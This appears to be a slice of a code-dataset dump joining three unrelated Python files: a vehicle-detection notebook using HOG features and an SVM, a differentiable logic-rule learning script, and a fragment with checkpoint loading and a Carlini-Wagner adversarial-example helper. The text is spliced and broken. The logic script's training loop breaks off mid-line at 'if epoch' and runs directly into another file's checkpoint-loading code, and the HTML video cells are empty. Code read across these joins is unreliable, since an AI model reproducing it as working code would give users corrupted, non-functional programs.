96\n#xy_window = 128\n\nfor img_src in example_images:\n t1 = time.time()\n img = mpimg.imread(img_src)\n draw_img = np.copy(img)\n img = img.astype(np.float32)/255\n print(np.min(img), np.max(img))\n \n windows = slide_window(img, x_start_stop=[None, None], y_start_stop=y_start_stop, \n xy_window=(xy_window, xy_window), xy_overlap=(overlap, overlap))\n\n hot_windows = search_windows(img, windows, svc, X_scaler, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat) \n\n window_img = draw_boxes(draw_img, hot_windows, color=(0, 0, 255), thick=6) \n images.append(window_img)\n titles.append('')\n print(time.time()-t1, 'seconds to process one image searching', len(windows), 'windows')\nfig = plt.figure(figsize=(12,18), dpi=300)\nvisualize(fig, 5, 2, images, titles)\n\n\n# In[7]:\n\n#plt.imshow(window_img)\nfor i, img in enumerate(images):\n plt.imsave('test_images_results/test_bboxes'+str(i+1)+'.png',images[i])\n\n\n# In[8]:\n\n# function for converting color spaces\n\ndef convert_color(img, conv='RGB2YCrCb'):\n if conv == 'RGB2YCrCb':\n return cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n if conv == 'BGR2YCrCb':\n return cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)\n if conv == 'RGB2LUV':\n return cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n\n\n# In[9]:\n\n# Create a heatmap on test images\n\nout_images = 
[]\nout_maps = []\nout_titles = []\nout_boxes = []\n\nystart = 400\nystop = 656\nscale = 1.5\n#scale = 1\n\nfor img_src in example_images:\n img_boxes = []\n t = time.time()\n count = 0\n img = mpimg.imread(img_src)\n draw_img = np.copy(img)\n \n heatmap = np.zeros_like(img[:,:,0])\n img = img.astype(np.float32)/255\n \n img_tosearch = img[ystart:ystop,:,:]\n ctrans_tosearch = convert_color(img_tosearch, conv='RGB2YCrCb')\n \n if scale != 1:\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\n\n ch1 = ctrans_tosearch[:,:,0]\n ch2 = ctrans_tosearch[:,:,1]\n ch3 = ctrans_tosearch[:,:,2]\n\n nxblocks = (ch1.shape[1] // pix_per_cell) - 1\n nyblocks = (ch1.shape[0] // pix_per_cell) - 1\n nfeat_per_block = orient*cell_per_block**2\n window = 64\n nblocks_per_window = (window // pix_per_cell) - 1\n cells_per_step = 2\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, feature_vec=False)\n\n for xb in range(nxsteps):\n for yb in range(nysteps):\n count += 1\n ypos = yb*cells_per_step\n xpos = xb*cells_per_step\n\n #extract HOG for this patch\n hog_feat1 = hog1[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n hog_feat2 = hog2[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n hog_feat3 = hog3[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n\n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos*pix_per_cell\n ytop = ypos*pix_per_cell\n\n #extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop+window, xleft:xleft+window], (64, 64))\n\n #get color features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n #scale features and make predictions\n test_features = X_scaler.transform(np.hstack((spatial_features, hist_features, hog_features)))\n #test_features = X_scaler.transform(np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1)) \n\n test_prediction = svc.predict(test_features)\n\n if test_prediction == 1:\n xbox_left = np.int(xleft*scale)\n ytop_draw = np.int(ytop*scale) \n win_draw = np.int(window*scale) \n cv2.rectangle(draw_img, (xbox_left, ytop_draw+ystart), (xbox_left+win_draw, ytop_draw+win_draw+ystart),(0,0,255))\n img_boxes.append(((xbox_left, ytop_draw+ystart),(xbox_left+win_draw, ytop_draw+win_draw+ystart))) \n heatmap[ytop_draw+ystart:ytop_draw+win_draw+ystart, xbox_left:xbox_left+win_draw] += 1\n\n print(time.time()-t, 'seconds to run, total windows = ', count)\n\n out_images.append(draw_img)\n\n out_titles.append(img_src[-9:-4] + '_org_with_boxes.png')\n out_titles.append(img_src[-9:-4] + '_just_heatmap.png')\n \n\n out_images.append(heatmap)\n out_maps.append(heatmap) \n out_boxes.append(heatmap)\n \nfig = plt.figure(figsize = (12,24))\nvisualize(fig, 8, 2, out_images, out_titles)\n\n\n# In[10]:\n\n#plt.imshow(window_img)\nfor i, img in enumerate(out_images):\n plt.imsave('test_images_results/'+out_titles[i],out_images[i])\n\n\n# In[11]:\n\n### Detect Vehicles\n\n#dist_pickle = pickle.load( open(\"svc_pickle.p\", \"rb\" ) )\n#svc = dist_pickle[\"svc\"]\n#X_scaler = dist_pickle[\"scaler\"]\n#orient = 
dist_pickle[\"orient\"]\n#pix_per_cell = dist_pickle[\"pix_per_cell\"]\n#cell_per_block = dist_pickle[\"cell_per_block\"]\n#spatial_size = dist_pickle[\"spatial_size\"]\n#hist_bins = dist_pickle[\"hist_bins\"]\n\n#img = mpimg.imread('test_image.jpg')\n\n# Define a single function that can extract features using hog sub-sampling and make predictions\n#def find_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins):\ndef find_cars(img, scale):\n \n draw_img = np.copy(img)\n heatmap = np.zeros_like(img[:,:,0])\n img = img.astype(np.float32)/255\n \n img_tosearch = img[ystart:ystop,:,:]\n ctrans_tosearch = convert_color(img_tosearch, conv='RGB2YCrCb')\n if scale != 1:\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\n \n ch1 = ctrans_tosearch[:,:,0]\n ch2 = ctrans_tosearch[:,:,1]\n ch3 = ctrans_tosearch[:,:,2]\n\n # Define blocks and steps as above\n nxblocks = (ch1.shape[1] // pix_per_cell) - cell_per_block + 1\n nyblocks = (ch1.shape[0] // pix_per_cell) - cell_per_block + 1 \n nfeat_per_block = orient*cell_per_block**2\n \n # 64 was the orginal sampling rate, with 8 cells and 8 pix per cell\n window = 64\n #nblocks_per_window = (window // pix_per_cell) - cell_per_block + 1\n nblocks_per_window = (window // pix_per_cell) - 1\n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n \n # Compute individual channel HOG features for the entire image\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, feature_vec=False)\n \n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb*cells_per_step\n xpos = xb*cells_per_step\n # Extract HOG for this patch\n hog_feat1 = hog1[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat2 = hog2[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat3 = hog3[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos*pix_per_cell\n ytop = ypos*pix_per_cell\n\n # Extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop+window, xleft:xleft+window], (64,64))\n \n # Get color features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n # Scale features and make a prediction\n test_features = X_scaler.transform(np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1)) \n #test_features = X_scaler.transform(np.hstack((shape_feat, hist_feat)).reshape(1, -1)) \n test_prediction = svc.predict(test_features)\n \n if test_prediction == 1:\n xbox_left = np.int(xleft*scale)\n ytop_draw = np.int(ytop*scale)\n win_draw = np.int(window*scale)\n #cv2.rectangle(draw_img,(xbox_left, ytop_draw+ystart),(xbox_left+win_draw,ytop_draw+win_draw+ystart),(0,0,255),6) \n cv2.rectangle(draw_img, (xbox_left, ytop_draw+ystart), (xbox_left+win_draw, ytop_draw+win_draw+ystart),(0,0,255))\n img_boxes.append(((xbox_left, ytop_draw+ystart),(xbox_left+win_draw, ytop_draw+win_draw+ystart))) \n heatmap[ytop_draw+ystart:ytop_draw+win_draw+ystart, xbox_left:xbox_left+win_draw] += 1\n\n return 
draw_img, heatmap\n \n#ystart = 400\n#ystop = 656\n#scale = 1.5\n \n#out_img = find_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins)\n\n#plt.imshow(out_img)\n\n\n# In[12]:\n\ndef apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n # Return thresholded map\n return heatmap\n\ndef draw_labeled_bboxes(img, labels):\n # Iterate through all detected cars\n for car_number in range(1, labels[1]+1):\n # Find pixels with each car_number label value\n nonzero = (labels[0] == car_number).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n # Draw the box on the image\n cv2.rectangle(img, bbox[0], bbox[1], (0,0,255), 6)\n # Return the image\n return img\n\n\n# In[13]:\n\nout_images = []\nout_maps = []\nystart = 400\nystop = 656\nscale = 1.5\n\nfor img_src in example_images:\n\n img = mpimg.imread(img_src)\n out_img, heat_map = find_cars(img, scale)\n \n threshold = 1\n heat_map = apply_threshold(heat_map, threshold)\n labels = label(heat_map)\n \n #draw bounding boxes on the image\n draw_img = draw_labeled_bboxes(np.copy(img), labels)\n out_images.append(draw_img)\n out_images.append(heat_map)\n# cv2.imwrite('/test_images_results/test1_bbox.jpg',draw_img)\n# cv2.imwrite('/test1_heatmap.jpg',heat_map)\n \nfig = plt.figure(figsize = (12,24))\nvisualize(fig, 8, 2, out_images, out_titles)\n\n\n# In[14]:\n\ndef process_image(img):\n \n out_img, heat_map = find_cars(img, scale)\n threshold = 1\n heat_map = apply_threshold(heat_map, threshold)\n labels = label(heat_map)\n draw_img = draw_labeled_bboxes(np.copy(img), labels)\n return draw_img\n\n\n# In[15]:\n\ntest_output = 'test.mp4'\n#clip = VideoFileClip(\"project_video.mp4\")\nclip = VideoFileClip(\"test_video.mp4\")\ntest_clip = clip.fl_image(process_image) #NOTE: this function expects color images!!\nget_ipython().magic(u'time test_clip.write_videofile(test_output, audio=False)')\n#test_clip.write_videofile(test_output, audio=False)\n\n\n# In[16]:\n\nHTML(\"\"\"\n\n\"\"\".format(test_output))\n\n\n# In[17]:\n\nfinal_output = 'final.mp4'\nclip = VideoFileClip(\"project_video.mp4\")\nfinal_clip = clip.fl_image(process_image) #NOTE: this function expects color images!!\nget_ipython().magic(u'time final_clip.write_videofile(final_output, audio=False)')\n#test_clip.write_videofile(test_output, audio=False)\n\n\n# In[18]:\n\nHTML(\"\"\"\n\n\"\"\".format(final_output))\n\n\n# In[ ]:\n\n\n\n","repo_name":"Kamil-K/Self-Driving-Car","sub_path":"Vehicle_detection/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":33077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2590309158","text":"import numpy\nimport torchtext\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom torchtext.vocab import Vectors, GloVe\nimport torch.nn.functional as F\nimport pdb\nfrom copy import deepcopy\nimport pdb\n\n'''\n## Predecessor\n##------DATA--------\nnum_constants = 10\nbackground_predicates =[0,1]\nintensional_predicates=[2]\n\n##Background Knowledge\nzero_extension = torch.zeros(1,num_constants).view(-1,1)\nzero_extension[0,0] = 1\nsucc_extension = torch.eye(num_constants-1,num_constants-1)\nsucc_extension = 
torch.cat((torch.zeros(num_constants-1,1),succ_extension),1)\nsucc_extension = torch.cat((succ_extension,torch.zeros(1,num_constants)),0)\n\n#Intensional Predicates\npredecessor_extension = torch.zeros(num_constants,num_constants)\n\n##Target\nsteps = 2\ntarget = Variable(torch.zeros(num_constants,num_constants))\ntarget[1,0] =1\ntarget[2,1] =1\ntarget[3,2] =1\ntarget[4,3] =1\ntarget[5,4] =1\ntarget[6,5] =1\ntarget[7,6] =1\ntarget[8,7] =1\ntarget[9,8] =1\n\n\nvaluation_init = [Variable(zero_extension), Variable(succ_extension), Variable(predecessor_extension)]\n\nnum_rules = 1\nrules_str = [9]\n\n'''\n############ Even/odd\n\n##------DATA--------\nnum_constants = 5\nbackground_predicates =[0,1]\nintensional_predicates=[2,3]\n\n##Background Knowledge\nzero_extension = torch.zeros(1,num_constants).view(-1,1)\nzero_extension[0,0] = 1\nsucc_extension = torch.eye(num_constants-1,num_constants-1)\nsucc_extension = torch.cat((torch.zeros(num_constants-1,1),succ_extension),1)\nsucc_extension = torch.cat((succ_extension,torch.zeros(1,num_constants)),0)\n\n#Intensional Predicates\naux_extension = torch.zeros(1,num_constants).view(-1,1)\neven_extension = torch.zeros(1,num_constants).view(-1,1)\n\n##Target\ntarget = Variable(torch.zeros(1,num_constants)).view(-1,1)\nsteps = 5\neven = [0,2,4]\nfor integer in even:\n target[integer,0]=1\n\nvaluation_init = [Variable(zero_extension), Variable(succ_extension), Variable(aux_extension), Variable(even_extension)]\n\nnum_rules = 3\nrules_str = [1,2,2]\n\n'''\n############### Less-Than\n##------DATA--------\nnum_constants = 10\nbackground_predicates =[0,1]\nintensional_predicates=[2]\n\n##Background Knowledge\nzero_extension = torch.zeros(1,num_constants).view(-1,1)\nzero_extension[0,0] = 1\nsucc_extension = torch.eye(num_constants-1,num_constants-1)\nsucc_extension = torch.cat((torch.zeros(num_constants-1,1),succ_extension),1)\nsucc_extension = torch.cat((succ_extension,torch.zeros(1,num_constants)),0)\n\n#Intensional Predicates\nless_extension = torch.zeros(num_constants, num_constants)\n\n##Target\nsteps = 5\ntarget = Variable(torch.zeros(num_constants, num_constants))\nfor i in range(num_constants):\n for j in range(i):\n target[j,i] = 1\n\nvaluation_init = [Variable(zero_extension), Variable(succ_extension), Variable(less_extension)]\n\n\nnum_rules = 2\nrules_str = [5,3]\n\n#################### Son\nnum_constants = 9\nbackground_predicates =[0,1,2]\nintensional_predicates=[3,4]\n\n##Background Knowledge\nfather_extension = torch.zeros(num_constants,num_constants)\nbrother_extension = torch.zeros(num_constants,num_constants)\nsister_extension = torch.zeros(num_constants,num_constants)\n\nfather_extension[0,1] = 1 \nfather_extension[0,2] = 1 \nfather_extension[3,4] = 1 \nfather_extension[3,5] =\t1\nfather_extension[6,7] = 1 \nfather_extension[6,8] =\t1\nbrother_extension[1,2] = 1 \nbrother_extension[2,1] = 1\nbrother_extension[4,5] = 1 \nsister_extension[5,4] =\t1\nsister_extension[7,8] = 1 \nsister_extension[8,7] =\t1\n\n#Intensional Predicates\naux_extension = torch.zeros(1,num_constants).view(-1,1)\nson_extension = torch.zeros(num_constants,num_constants)\n\n##Target\ntarget = Variable(torch.zeros(num_constants, num_constants))\ntarget[1,0] = 1\ntarget[2,0] = 1\ntarget[4,3] = 1\n\nsteps = 2\n\nvaluation_init = [Variable(father_extension), Variable(brother_extension), Variable(sister_extension), Variable(aux_extension), Variable(son_extension)]\n\nnum_rules = 3\nrules_str = [11, 12, 12]\n\n############# Husband Requires Dataset \nnum_rules = 1\nrules_str 
= [3]\n\n############# Uncle Requires Dataset\nnum_rules = 3\nrules_str = [3,5,5]\n\n####### Relatedness\nnum_constants = 8\nbackground_predicates =[0]\nintensional_predicates=[1,2]\n\n##Background Knowledge\nparent_extension = torch.zeros(num_constants,num_constants)\n\nparent_extension[0,1] = 1\nparent_extension[0,2] = 1\nparent_extension[2,4] = 1 \nparent_extension[2,5] = 1\nparent_extension[3,2] = 1\nparent_extension[6,7] = 1\n\n#Intensional Predicates\naux_extension = torch.zeros(num_constants, num_constants)\nrelated_extension = torch.zeros(num_constants,num_constants)\n\n##Target\ntarget = torch.ones(num_constants-2, num_constants-2)\ntarget = torch.cat((target, torch.zeros(2, num_constants -2)), 0)\ntarget = torch.cat((target, torch.zeros(num_constants,2)), 1)\ntarget[6,7] = 1\ntarget[6,6] = 1\ntarget[7,7] = 1\ntarget[7,6] = 1\ntarget = Variable(target)\nsteps = 4\n\nvaluation_init = [Variable(parent_extension), Variable(aux_extension), Variable(related_extension)]\n\n\nnum_rules = 4\nrules_str = [5,3,5,9]\n\n########### Father\nnum_constants = 12\nbackground_predicates =[0,1,2,3]\nintensional_predicates=[4]\n\n##Background Knowledge\nbrother_extension = torch.zeros(num_constants,num_constants)\nhusband_extension = torch.zeros(num_constants,num_constants)\nmother_extension = torch.zeros(num_constants,num_constants)\naunt_extension = torch.zeros(num_constants,num_constants)\n\nmother_extension[0,1] = 1\nbrother_extension[2,1] = 1\nhusband_extension[2,3] = 1\naunt_extension[3,4] = 1\nmother_extension[3,5] = 1\naunt_extension[3,6] = 1\nbrother_extension[7,8] = 1\nhusband_extension[8,9] = 1\nbrother_extension[9,10] = 1\nmother_extension[9,11] = 1\n\n#Intensional Predicates\nfather_extension = torch.zeros(num_constants,num_constants)\n\n##Target\ntarget = Variable(torch.zeros(num_constants, num_constants))\ntarget[2,5] = 1\ntarget[8,11] = 1\n\nsteps = 1\n\nvaluation_init = [Variable(brother_extension), Variable(husband_extension), Variable(mother_extension), Variable(aunt_extension), Variable(father_extension)]\n\nnum_rules = 1\nrules_str = [3]\n\n############### Graph connectedness \n\nnum_constants = 4\nbackground_predicates =[0]\nintensional_predicates=[1]\n\n##Background Knowledge\nedge_extension = torch.zeros(num_constants,num_constants)\nedge_extension[0,1] = 1\nedge_extension[1,2] = 1\nedge_extension[2,3] = 1\nedge_extension[1,0] = 1\n\n#Intensional Predicates\nconnected_extension = torch.zeros(num_constants,num_constants)\n\n##Target\ntarget = Variable(torch.zeros(num_constants, num_constants))\ntarget[0,0] = 1\ntarget[0,1] = 1\ntarget[0,2] = 1\ntarget[0,3] = 1\ntarget[1,0] = 1\ntarget[1,1] = 1\ntarget[1,2] = 1\ntarget[1,3] = 1\ntarget[2,3] = 1\n\nsteps = 3\n\nvaluation_init = [Variable(edge_extension), Variable(connected_extension)]\n \nnum_rules = 2\nrules_str = [5, 3]\n\n\nbackground_predicates =[0,1]\nintensional_predicates=[2,3]\n\n##Background Knowledge\nnum_constants = 5\n\nneq_extension = torch.ones(num_constants, num_constants)\nfor i in range(num_constants):\n neq_extension[i,i] = 0\n\nedge_extension = torch.zeros(num_constants, num_constants)\nedge_extension[0,1] = 1\nedge_extension[0,2] = 1\nedge_extension[1,3] = 1\nedge_extension[2,3] = 1\nedge_extension[2,4] = 1\nedge_extension[3,4] = 1\n\n#Intensional Predicates\ntarget_extension = torch.zeros(1, num_constants).view(-1,1)\naux_extension = torch.zeros(num_constants,num_constants)\n\nvaluation_init = [Variable(neq_extension), Variable(edge_extension), Variable(aux_extension), 
Variable(target_extension)]\n\n##Target\ntarget = Variable(torch.zeros(1,num_constants)).view(-1,1)\ntarget[0,0] = 1\ntarget[2,0] = 1\n\nsteps = 2\n\nnum_rules = 2\nrules_str = [14,3]\n\n'''\n\n## 1 F(x) <-- F(X)\n## 2 F(x)<---F(Z),F(Z,X)\n## 3 F(x,y)<-- F(x,Z),F(Z,Y)\n## 4 F(X) <-- F(X,X)\n## 5 F(X,Y) <-- F(X,Y)\n## 8 F(X,X) <-- F(X)\n\n##----Num tasks\n## 9 F(x,y) <-- F(y,x)\n## 10 F(x,y)<---F(y,Z),F(X,Z)\n## 11 F(x,y)<-- F(y,x),F(x)\n## 12 F(X) <-- F(X,Z)\n## 13 F(X) <-- F(X,Z), F(Z)\n## 14 F(X) <-- F(X,Z), F(X,Z)\n\n\nnum_predicates= len(valuation_init)\nnum_intensional_predicates = len(intensional_predicates)\nnum_feat = num_predicates\n\n\n\n##------FORWARD CHAINING------\ndef decoder_efficient(valuation, step):\n ##Unifications\n rules_aux = torch.cat((noisy_rules[:,:num_feat], noisy_rules[:,num_feat:2*num_feat], noisy_rules[:,2*num_feat:3*num_feat]),0)\n rules_aux = rules_aux.repeat(num_predicates,1)\n embeddings_aux = noisy_embeddings.repeat(1,num_rules*3).view(-1,num_feat) \n unifs = F.cosine_similarity(embeddings_aux, rules_aux).view(num_predicates,-1)\n #unifs = F.pairwise_distance(embeddings_aux, rules_aux).view(num_predicates,-1)\n #unifs = torch.exp(-unifs)\n #unifs_sum = torch.sum(unifs, 0)\n #unifs= unifs/unifs_sum\n \n ##Get_Valuations\n valuation_new = [valuation[i].clone() for i in background_predicates] + \\\n [Variable(torch.zeros(valuation[i].size())) for i in intensional_predicates] \n \n for predicate in intensional_predicates:\n for s in range(num_constants):\n if valuation[predicate].size()[1] == 1:\n max_score = Variable(torch.Tensor([0]))\n for rule in range(num_rules):\n if rules_str[rule] == 1:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] == 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = valuation[body1][s,0]\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 2:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] == 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][:,0],valuation[body2][:,s])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 4:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = valuation[body1][s,s]\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 12:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = torch.max(valuation[body1][s,:])\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 13:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] == 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][s,:],valuation[body2][:,0])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 14:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] > 1:\n unif = 
unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][s,:],valuation[body2][s,:])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n\n valuation_new[predicate][s,0] = torch.max(valuation[predicate][s,0], max_score)\n else:\n for o in range(num_constants):\n max_score = Variable(torch.Tensor([0]))\n for rule in range(num_rules):\n if rules_str[rule] == 3:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][s,:],valuation[body2][:,o])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 5:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = valuation[body1][s,o]\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 8:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] == 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = valuation[body1][s,0]\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 9:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = valuation[body1][o,s]\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 10:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][s,:],valuation[body2][o,:])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 11:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] == 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][o,s],valuation[body2][s,0])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n\n\n valuation_new[predicate][s,o] = torch.max(valuation[predicate][s,o], max_score) \n return valuation_new\n \ndef amalgamate(x,y):\n return x + y - x*y\n\n##------SETUP------\nnum_iters = 1200\nlearning_rate = .1\nlearning_rate_rules1=.1\nlearning_rate_rules2=.05\nlearning_rate_rules3=.01\nhyper_epsilon = .0\nhyper_epoch = 30\n\nhyper_epsilon_r = 1.50\nhyper_epoch_r = 60\n\n\n\n\n#embeddings = Variable(torch.rand(num_predicates, num_feat), requires_grad=True)\n#embeddings = Variable(torch.zeros(num_predicates, num_feat)+.9, requires_grad=True)\nembeddings = Variable(torch.eye(num_predicates), requires_grad=True)\n\nrules = Variable(torch.rand(num_rules, num_feat*3), requires_grad=True)\n#rules = Variable(torch.zeros(num_rules, num_feat*3)+.1, requires_grad=True)\n#rule1 = torch.Tensor([0,0,0,1,1,0,0,0,0,0,1,0]).view(1,-1)\n#rule2 = torch.Tensor([0,0,0,1,0,0,1,0,0,1,0,0]).view(1,-1)\n#rule3 = torch.Tensor([0,0,1,0,0,0,0,1,0,1,0,0]).view(1,-1)\n#rules = Variable(torch.cat((rule1,rule2,rule3),0), 
requires_grad=True)\noptimizer = torch.optim.Adam([\n\n {'params': [embeddings]},\n {'params': [rules], 'lr': learning_rate_rules1}\n #{'params': [rules[0,:]], 'lr': learning_rate_rules1},\n #{'params': [rules[1,:]], 'lr': learning_rate_rules2}, \n #{'params': [rules[2,:]], 'lr': learning_rate_rules3}\n ],lr=learning_rate)\ncriterion = torch.nn.BCELoss(size_average=False)\n\n##-------TRAINING------\nfor epoch in range(num_iters):\n if epoch%hyper_epoch == 0:\n hyper_epsilon = hyper_epsilon/2.\n if epoch%hyper_epoch_r == 0:\n hyper_epsilon_r = hyper_epsilon_r*.7\n\n epsilon = torch.randn(rules.size())\n noisy_rules = rules + hyper_epsilon_r*epsilon\n\n epsilon_emb = torch.randn(embeddings.size())\n noisy_embeddings = embeddings + hyper_epsilon*epsilon_emb\n\n for par in optimizer.param_groups[:]:\n for param in par['params']:\n param.data.clamp_(min=0.0,max=1.0)\n\n optimizer.zero_grad()\n valuation = valuation_init\n\n for step in range(steps):\n valuation = decoder_efficient(valuation,step)\n #print('step',step,'valuation3', valuation[3], 'valuation2',valuation[2])\n\n loss = criterion(valuation[-1],target)\n print(epoch,'lossssssssssssssssssssssssssss',loss.data[0])\n\n if epoch loading checkpoint '{}'\".format(filepath))\n checkpoint = torch.load(filepath)\n\n start_epoch = checkpoint['epoch']\n if net_local is None:\n net.load_state_dict(checkpoint['state_dict'])\n else:\n net_local.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n #scheduler.load_state_dict(checkpoint['scheduler'])\n print(\"=> loaded checkpoint (epoch {})\"\n .format(checkpoint['epoch']))\n else:\n print(\"=> no checkpoint found at '{}'\".format(filepath))\n\ndef getAdvZ(img_size,labels,batch_size,minibs):\n\n c=10\n k=5\n st = 100\n z0 = torch.rand((minibs,3,img_size,img_size)) \n cwatt = juncw.CW(target_model,c=c,kappa=k,steps=st,targeted=True,target_labels=labels) \n \n succ = False\n adv = cwatt(z0,labels)\n del cwatt\n outputs = target_model(adv)\n _,pre = torch.max(outputs,1)\n\n succ = len(torch.where(pre==labels)[0])\n\n return adv,succ\n\n\n\n\n\ndef plotval(epoch,vallabel,outputname,*args):\n assert len(vallabel)==len(args)\n i = 0\n for data in args:\n plt.clf()\n plt.plot(data)\n plt.xlabel(epoch)\n plt.ylabel(vallabel[i])\n plt.savefig('{}/{}.jpg'.format(outputname,vallabel[i])) \n i += 1\n\ndef plotloss(train_losses,train_loss_secret_history,attloss_history,loss_cover_history,outputname,epoch):\n plt.clf()\n plt.plot(train_losses)\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Batch')\n plt.savefig('{}/lossCurve.png'.format(outputname)) \n\n plt.clf()\n plt.plot(train_loss_secret_history)\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Batch')\n plt.savefig('{}/secrectlossCurve.png'.format(outputname)) \n\n 